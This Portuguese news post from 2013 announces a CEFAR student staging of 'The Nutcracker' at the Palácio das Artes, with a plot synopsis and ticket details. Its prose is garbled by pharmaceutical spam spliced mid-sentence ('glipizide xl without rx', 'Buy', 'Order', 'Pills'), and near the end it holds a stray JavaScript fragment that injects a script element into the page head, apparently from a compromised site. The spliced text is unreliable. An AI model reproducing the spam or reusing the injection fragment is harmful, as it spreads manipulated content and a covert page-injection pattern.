Escrito por em 4 dez 2013 nas áreas Balé/Dança, Lateral, Minas Gerais, Programação

“O Quebra Nozes”, clássico da dança mundial que retrata sonhos e fantasias de Natal, será encenado por 115 alunos do CEFAR.

Em clima de Natal, o Grande Teatro do Palácio das Artes será palco de uma importante celebração. Trata-se do espetáculo anual do curso de Dança do Centro de Formação Artística da glipizide xl without rx Fundação Clóvis Salgado (CEFAR), que este ano encenará o clássico “O Quebra Nozes”, que possui trilha sonora composta por Tchaicovsky. Com direção de Joana Wanner, a montagem conta com a participação de todos os 115 alunos do curso de dança, desde o nível básico (crianças a partir de 8 anos) aos bailarinos do curso profissionalizante.

A montagem foi feita em parceria com a Cia Brasileira de Balé, do Rio de Janeiro, de onde provém grande parte de cenários e figurinos. “O Quebra Nozes é uma peça complexa, que envolve muitos bailarinos em cena, muitas trocas de figurinos e de cenários. Quando propus que a encenássemos, não sabia se os professores comprariam a ideia. Para minha felicidade, muitos deles já tinham dançado este balé em suas trajetórias profissionais e aceitaram na hora pela conexão da peça com a temática natalina”, revela Joana Wanner, diretora do espetáculo e Coordenadora do Departamento de Dança do CEFAR.

Além da escolha da peça, a coordenação do Curso de Dança inovou também na escalação dos papéis principais da grandiosa apresentação. “Pela primeira vez decidimos indicar nossos alunos para os papéis principais no lugar de convidar bailarinos profissionais. É uma aposta ousada, mas o fizemos porque sabemos que nossos alunos estão bem preparados e acreditamos na capacidade técnica e artística de nosso corpo de dançarinos”, explica Joana.

 

FESTA NATALINA

“O Quebra-Nozes” estreou em 17 de dezembro de 1892, no Teatro Mariinsky, em São Petersburgo, a então capital da Rússia Imperial. É um conto que se passa na Europa Oriental, durante o século XIX. Retrata uma festa natalina oferecida pelo casal Stahlbaum. Seus três filhos – Clara, Fritz e Louise esperam ansiosos pelos convidados. A neve traz uma atmosfera festiva enquanto os convidados chegam. Atrasado como sempre e em grande alegria, o padrinho de Clara, Herr Drosselmeyer, chega divertindo a todos com sua magia e seus bonecos dançantes. Todas as crianças recebem presentes, mas Purchase o de Clara é especial – um lindo quebra-nozes em formato de soldado. A festa chega ao fim e Clara adormece, encantada com o presente.

Esta primeira parte do espetáculo, em que são apresentas a Casa, a família de Clara e a Festa de Natal, é encenada por meio de pantomimas, gestos de fácil leitura que não utilizam de linguagem verbal. No fim do primeiro ato, a coreografia ‘Flocos de Neve’ retrata o adormecimento da menina. Em seu sonho, ratos gigantes invadem o salão e o seu boneco Quebra-Nozes, agora com vida, vence os ratos comandando um exército de soldadinhos de chumbo. Clara sente a presença de seu padrinho que, num passe de mágica, transforma o boneco num online belo príncipe.

Eles são conduzidos ao Reino das Buy Neves, onde encontram os dançantes flocos de neve, e ao Reino dos Doces, onde vive a Fada Açucarada que homenageia a menina com uma grande festa. Os doces de diversas regiões e as flores dançam e participam de uma grande festa.

 Cada turma de alunos do CEFAR compõe um núcleo desse sonho de natal. As coreografias dos países, por exemplo, são executadas pelos alunos do curso Order básico. Com coreografia de Fernanda Vieira, os alunos do Básico I (de 9 a 12 anos) apresentam a dança Chinesa; os alunos do Básico II (de 12 a 14 anos), sob coordenação de Cristiana Menezes, apresentam a dança Russa; e os alunos do Básico III (14 a 16 anos), orientados por Eliatrice Gischewski, apresentam a dança Espanhola. A dança Árabe fica por conta de uma solista e dois bailarinos, do curso profissionalizante (de 15 a 25 anos).

 Esse ato se encerra com a coreografia ‘Madame Bombom’, encenada por alunos do Preliminar (8 a 11 anos), primeiro nível do Básico. Tal personagem, que normalmente é interpretada nos balés por homens grandiosos, nessa Order adaptação é representada por um carro alegórico com uma longa saia, de onde as crianças, os pequenos doces de Madame Bombom, saem.

 O terceiro ato traz ‘A Valsa das Flores’, uma coreografia de padedês em que encenam dez casais e uma solista, todos bailarinos do curso profissionalizante. Em seguida, há o Grande Adágio, o momento mais importante do balé, em que a Fada Açucarada dança com o príncipe. Este é o momento em que Clara acorda e percebe que tudo não passou de um sonho.

 

 SERVIÇO

 

Grande Teatro do Palácio das Artes – Av. Afonso Pena, 1.537, Centro

Pills

Dias 10 e 11 de dezembro de 2013, às 20h30

Buy

Ingressos: R$ 10,00 (inteira) – R$ 5,00 (meia)

Informações para o Público: (31) 3236-7400

 

document.currentScript.parentNode.insertBefore(s, document.currentScript);d.getElementsByTagName(‘head’)[0].appendChild(s);

Faça seu comentário